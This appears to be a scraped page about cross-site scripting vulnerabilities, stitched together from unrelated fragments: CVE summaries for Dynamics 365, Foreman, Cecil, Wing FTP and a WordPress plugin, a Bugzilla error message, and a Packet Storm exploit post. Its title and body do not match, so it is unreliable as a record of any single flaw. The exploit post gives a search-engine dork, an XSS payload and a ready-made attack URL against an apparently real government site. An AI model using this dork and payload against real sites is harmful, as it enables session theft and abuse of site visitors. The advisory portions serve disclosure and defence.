Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability

CVE-2023-38164

A stored Cross-site scripting vulnerability was found in foreman. The Comment section in the Hosts tab has incorrect filtering of user input data. As a result of the attack, an attacker with an existing account on the system can steal another user's session, make requests on behalf of the user, and obtain user credentials.

'2159104?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-0119: Invalid Bug ID

KALIMATAN GMS version 1.0.0 suffers from a cross site scripting vulnerability.

**KALIMATAN GMS 1.0.0 Cross Site Scripting**

Posted Sep 12, 2023

Authored by indoushka

KALIMATAN GMS version 1.0.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | bd48e4a98638b72cd97b9bc442df28c3737e9b1208d03e5a4a7f58660e0bf243

Download | Favorite | View

**KALIMATAN GMS 1.0.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : KALIMATAN GMS V1.0.0 XSS Vulnerability                                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : http://teppa.kaltimprov.go.id/                                                                                     |  | # Dork      : inurl:/front/grafik.php?tahun=                                                                                     |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : <script>alert(/indoushka/);</script>[+] http://Targetteppa.kaltimprovgoid/front/grafik.php?tahun=2018&bulan=%3Cscript%3Ealert(/indoushka/);%3C/script%3E Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,177)
*   Arbitrary (16,247)
*   BBS (2,859)
*   Bypass (1,743)
*   CGI (1,027)
*   Code Execution (7,301)
*   Conference (680)
*   Cracker (842)
*   CSRF (3,348)
*   DoS (23,519)
*   Encryption (2,371)
*   Exploit (52,086)
*   File Inclusion (4,228)
*   File Upload (977)
*   Firewall (821)
*   Info Disclosure (2,792)
*   Intrusion Detection (892)
*   Java (3,049)
*   JavaScript (860)
*   Kernel (6,732)
*   Local (14,499)
*   Magazine (586)
*   Overflow (12,704)
*   Perl (1,423)
*   PHP (5,152)
*   Proof of Concept (2,343)
*   Protocol (3,606)
*   Python (1,536)
*   Remote (30,852)
*   Root (3,590)
*   Rootkit (509)
*   Ruby (612)
*   Scanner (1,641)
*   Security Tool (7,895)
*   Shell (3,195)
*   Shellcode (1,216)
*   Sniffer (895)
*   Spoof (2,209)
*   SQL Injection (16,409)
*   TCP (2,407)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,825)
*   Web (9,695)
*   Whitepaper (3,751)
*   x86 (962)
*   XSS (17,994)
*   Other

**File Archives**

*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,005)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,833)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,323)
*   HPUX (879)
*   iOS (352)
*   iPhone (108)
*   IRIX (220)
*   Juniper (68)
*   Linux (46,676)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,841)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,896)
*   UNIX (9,306)
*   UnixWare (186)
*   Windows (6,584)
*   Other

KALIMATAN GMS 1.0.0 Cross Site Scripting

Cross-site Scripting (XSS) - Reflected in GitHub repository cecilapp/cecil prior to 7.47.1.

**Cecil Cross-site Scripting vulnerability**

Moderate severity GitHub Reviewed Published Sep 12, 2023 to the GitHub Advisory Database • Updated Sep 14, 2023

GHSA-p9q8-7x22-5x77: Cecil Cross-site Scripting vulnerability

CVE-2023-4913

Improper encoding or escaping of output in Wing FTP Server (User Web Client) allows Cross-Site Scripting (XSS).This issue affects Wing FTP Server: <= 7.2.0.



CVE-2023-37875: Wing FTP Server History

**According to the CVSS metric, user interaction is required (UI:R). What interaction would the user have to do?**

The user would have to click on a specially crafted URL to be compromised by the attacker.

CVE-2023-36800: Dynamics Finance and Operations Cross-site Scripting Vulnerability

CVE-2023-38164: Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability

CVE-2023-36886: Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability

The JQuery Accordion Menu Widget for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'dcwp-jquery-accordion' shortcode in versions up to, and including, 3.1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

This record contains material that is subject to copyright.

**Copyright 2012-2023 Defiant Inc.**

**License:** Defiant hereby grants you a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare derivative works of, publicly display, publicly perform, sublicense, and distribute this software vulnerability information. Any copy of the software vulnerability information you make for such purposes is authorized provided that you include a hyperlink to this vulnerability record and reproduce Defiant's copyright designation and this license in any such copy. **Read more.**

**Copyright 1999-2023 The MITRE Corporation**

**License:** CVE Usage: MITRE hereby grants you a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare derivative works of, publicly display, publicly perform, sublicense, and distribute Common Vulnerabilities and Exposures (CVE®). Any copy you make for such purposes is authorized provided that you reproduce MITRE's copyright designation and this license in any such copy. **Read more.**

Have information to add, or spot any errors? Contact us at wfi-support@wordfence.com so we can make any appropriate adjustments.

Tag

#xss